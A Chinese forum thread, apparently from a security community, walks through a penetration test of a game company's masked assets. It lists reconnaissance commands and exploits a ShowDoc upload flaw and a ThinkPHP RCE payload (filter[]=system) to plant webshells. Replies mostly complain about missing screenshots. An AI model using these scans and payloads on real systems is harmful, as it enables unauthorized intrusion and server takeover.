导航

xx游戏渗透实战练习一

#1
Xxx游戏渗透测试实战练习
⦁        资产搜集
1.        子域名:
使用oneforall挖掘对象所有存活子域名host及ip:python oneforall.py --target xxx.com --alive True run
  
1.        服务器:
使用nmap对所有服务器的端口进行扫描:nmap -v --open --min-rate 1500 -p - -iL E:\xxx.txt -oN E:\xxx_port.txt

1.        web指纹:
使用finger:python3 Finger.py -f /opt/project/xxxt.txt

⦁        漏洞搜集
1.        指纹poc验证:fscan64.exe -uf E:\渗透项目\....txt -o E:\渗透项目\....txt

⦁        漏洞利用
1.        对资产120.xx.10进行攻击:81端口发现showdoc网页,存在CNVD-2020-26585,任意上传漏洞

利用已知exp上传shell

蚂剑连接
  

1.        对资产119.xx.112进行攻击利用已知poc-yaml-thinkphp5023-method-rce:http://119.xx.112/index.php?s=captcha,   
_method=__construct&filter[]=system&a=di

上webshell,蚁剑连接

踩帖记录

  • T00ls路人甲:感觉你说了些什么,又感觉你什么也没有说?(2022-12-20 14:13:16)
  • T00ls路人乙:能不能发点有营养的东西,点进来就看到流水账(2022-12-20 14:35:02)
  • T00ls路人丙:你说什么就是什么,连个图都没用, 你说有啥漏洞就有啥漏洞,这帖子就这么铁吗? 发帖前看看总版规,另外这种演习过程让对外发布吗?(2022-12-20 16:54:23)
  • T00ls路人丁:没东西发就别发了,发的什么玩意,一天过去了也没见出来解释一下。(2022-12-20 19:57:34)
2022-12-19
#2
图片挂了吗,老哥看一下
get self
2022-12-19
#3
啊这,是没传图?
山海关安全团队www.shg-sec.com
2022-12-20
#4
求老哥发下图片看下
2022-12-20
#5
没图奥,外链不稳定吧
2022-12-20
#6
这是单纯的文字吗
80 字节以内
不支持自定义 Discuz! 代码
2022-12-20
#7
这是一个文字游戏呀!
2022-12-20
#8
没明白,是像楼上说的那样本来有图的么
2022-12-20
#9
文字描述的过程很通俗易懂,看过大致知道是怎么渗透的了
hello world
2022-12-20
#10
感觉这样直接把命令敲出来更方便理解,但是如果有图片就更好了